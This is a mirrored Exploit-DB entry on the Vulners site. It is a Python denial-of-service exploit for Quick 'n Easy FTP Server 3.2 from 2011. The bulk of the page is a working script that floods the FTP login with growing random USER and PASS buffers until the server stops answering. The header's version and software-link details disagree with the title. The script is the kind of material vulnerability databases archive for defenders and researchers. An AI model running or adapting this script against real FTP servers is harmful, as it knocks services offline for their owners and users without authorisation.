Lucene search
+L

Quick 'n Easy FTP Server 3.2 - Denial of Service

🗓️ 28 Feb 2011 00:00:00Reported by clshackType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 17 Views

Quick 'n Easy FTP Server 3.2 denial of service exploi

Code
# Exploit Title:[DOS LOGIN]  Quick 'n Easy FTP Server 3.2
# Date:28/2/2011
# Author: clshack
# Software Link:
http://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html<http://downstairs.dnsalias.net/homeftpserver.html>
# Version:1.12
# Tested on: windows xp sp3 en
# CVE :

#!/usr/bin/python
from ftplib import *
import random
import socket
def ping(host,port):
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
        connect=s.connect((host,port));
    except Exception ,e :
        print e
        return 0;
    s.close();
    return 1;

host = "192.168.1.155"
port = 21
buffer="";
while(len(buffer)<200000):
    buffer+=chr(int(random.uniform(0,255)))*2+"?";
    try:
        ftp=FTP();
        ftp.connect(host,port);
        ftp.sendcmd("USER "+buffer)
        ftp.sendcmd("PASS "+buffer)
        ftp.quit();
        ftp.close();
        sleep(int(random.uniform(0,2)))
    except Exception, e:
        print e
    if not ping(host,port):
        print "Dos in Login credentials \n"
        exit(-1)

Twitter:clshackblog

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2011 00:00Current
5.3Medium risk
Vulners AI Score5.3
17